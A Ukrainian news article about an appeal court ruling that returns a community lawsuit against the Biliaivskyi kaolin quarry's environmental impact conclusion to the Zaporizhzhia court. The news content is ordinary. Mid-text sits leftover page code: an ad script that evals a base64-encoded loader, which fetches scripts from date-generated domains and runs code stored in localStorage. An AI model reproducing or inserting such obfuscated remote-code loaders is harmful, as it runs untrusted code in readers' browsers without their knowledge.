Зроблено перший крок до визнання незаконною розбудову каолінового кар’єру під Запоріжжям (ФОТО)

12
січня у місті Дніпро відбулося судове
засідання, яке стало важливою ланкою для подальшого оскарження законності
будівництва Біляївського каолінового кар’єру на Вільнянщині.

Про це повідомляє кореспондент “Акцента”.

Так, Третій апеляційний адміністративний суд задовольнив апеляційну скаргу представників Вільнянської громади та скасував незаконну ухвалу Запорізького окружного адміністративного суду від 21.07.2022 щодо передачі справи «про скасування Висновку з оцінки впливу на довкілля виданого ТОВ «Біляївський збагачувальний комбінат» до Окружного адміністративного суду міста Києва.

“Ми змогли відстояти цю, дуже важливу справу, яку Верховний Суд повернув на новий розгляд, та яку вже під час нового розгляду хотіли «похоронити» в скандальному ОАСК!” — повідомляє адвокат Олена Пелих.

Олена Пелих

Суть
справи

Ще
у липні 2019 року Андрій Салякін (на той час голова Вільнянської районної
ради), представляючи інтереси багатотисячного району
звернувся до
Запорізького окружного адміністративного суду з позовною заявою про скасування Висновку
з оцінки впливу на довкілля (далі — ОВД), який в подальшому став підставою для отримання
дозволів на будівництво каолінового кар’єру. Позивач у своїй заяві зазначив, що
висновок ОВД був виданий незважаючи на численні зауваження громадськості і без
внесення їх врахування, хоча процедура видачі передбачає залучення до
обговорення громадськості і врахування думки місцевих мешканців. Проте
керівництво БЗК повністю проігнорувало це під час складання важливого
документу.

Далі, у 2019 та 2020 роках, представник громади Андрій Салякін, оскаржував в судах Висновок з оцінки впливу на довкілля, що виданий ТОВ «БЗК». Мінприроди, яке видало цей Висновок з ОВД, категорично заперечує, що отримувало від Андрія Салякіна зауваження щодо планованої діяльності, яка підлягає оцінці впливу на довкілля. З цих підстав, Запорізький окружний адміністративний суд, який розглядав справу Андрія Салякіна, відмовив у задоволенні позову, апеляція це рішення суду залишила без змін. Однак екоактивісти, попри всі перешкоди, не припинили своєї боротьби та продовжували шукати справедливості у вищестоящих судових інстанціях. І тільки Верховний Суд 02 листопада 2021 року, прийняв Постанову, якою скасував раніше ухвалені рішення судів та повернув справу на новий розгляд до Запорізького окружного адміністративного суду.

Андрій Салякін

Але, попри всі сподівання громадськості на справедливий судовий розгляд, 21 липня 2022 року Запорізький окружний адміністративний суд передав відповідну справу до Окружного адміністративного суду міста Києва — найскандальнішого суду України, який Верховна Рада України 13 грудня ліквідувала. Суд передав справу до Києва не витримавши навіть термінів на апеляційне оскарження, допустивши чергові процедурні порушення у багатостаждальній боротьбі за право жити і дихати без каолінового сусідства, вважають екоактивісти та адвокати.

Адвокат Олена Пелих каже, що таким чином справу хотіли «поховати» в скандальному ОАСК. Після передачі справи до ОАСК було відкрито провадження і в ОАСК і в Третьому апеляційному адміністративному суді. ОАСК пізніше зупинив провадження, а Андрій Салякін з адвокатом Оленою Пелих подали апеляційну скаргу до Третього апеляційного адміністративного суду з вимогою повернути справу знову до першої інстанції — у Запорізький окружний адміністративний суд.

І ось, майже через 4 роки після початку справи, Третій апеляційний адміністративний суд, враховуючи попередні засідання та вивчивши ситуацію з БЗК, виносить рішення на користь громади в особі Андрія Салякіна. Справу по суті, завдяки цьому, будуть розглядати у Запоріжжі. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Чому це важливо?

“Акцент” з початку виникнення конфлікту навколо БЗК на Вільнянщині висвітлює цю проблемну ситуацію: вже більше 5 років точаться суперечки навколо будівництва кар’єру на території Павлівської сільської ради. З самого початку виявилося, що місцеві мешканці виступають проти будівництва, протестуючи під будівлею ЗОДА та перекриваючи траси на мирних акціях. Як виявилося, це роблять не безпідставно, адже громадськість регулярно знаходить нові докази порушень у документації для розробки родовища каоліну та небезпеки, яку вона за собою несе.

Місцеві мешканці, спираючись на результати незалежних досліджень, впевнені,  що таке будівництво є екологічно небезпечним. Навколишні населені пункти і місто Запоріжжя можуть залишитись без чистої води, адже результати досліджень стверджують про наявність радіоактивного урану у місці видобутку та руд зі вмістом важких металів. Розробка родовища означатиме викид забрудненої води у річку, а отже зробить воду небезпечною не великих територіях.

Під час незалежних досліджень, Інститут ґрунтознавства та
агрохімії імені О.Н. Соколовського, встановив наявність особливо цінних земель
на території планованої розробки кар’єру, що апріорі забороняє вести діяльність
на таких ґрунтах.

За висновками Інституту геохімії навколишнього середовища
НАН України, виявлено, що зразки каоліну з Біляївського родовища заявлені БЗК
як 1 клас радіаційної безпеки, насправді частково відносяться до 2 класу,
а також містять важкі метали, які можуть спричиняти потенційний ризик
забруднення та інші негативні наслідки.

Київським НДІ судових експертиз констатовано, що у Звіті з ОВД розрахунків викидів забруднюючих речовин у атмосферне повітря суттєво применшено обсягів викидів під час видобутку каоліну. 

Що буде далі?

Екоактивісти та небайдужа громадськість продовжать
законними методами боротися з будівництвом небезпечного об’єкту. Судове
рішення, про яке ми написали вище, на думку адвоката Олени Пелих,
дозволить у подальшому визнати висновок з ОВД незаконним і скасувати його, а
отже визнати незаконним і саме будівництво кар’єра.

Це важливо, оскільки оскаржується Висновок з ОВД, з
початку його отримання БЗК отримувало і дозволи на будівництво. Якщо в
подальшому висновок скасовується, будуть скасовані і дозволи. Діяльність буде
припинено” — каже адвокат.

Олена Пелих сподівається, що Запорізький окружний адміністративний суд розгляне справу з дотриманням чинного законодавства,  ухвалить справедливі рішення та захистить врешті інтереси та права громади, яка вже не один рік захищає свої землі від незаконного і небезпечного будівництва.

Так, це лише перший, але дуже важливий крок, в подальшому очікуємо гарних новин по іншим судовим справам, які стосуються БЗК. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/zrobleno-pershij-krok-do-viznannya-nezakonnoyu-rozbudovu-kaolinovogo-kar-yeru-pid-zaporizhzhyam-foto/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top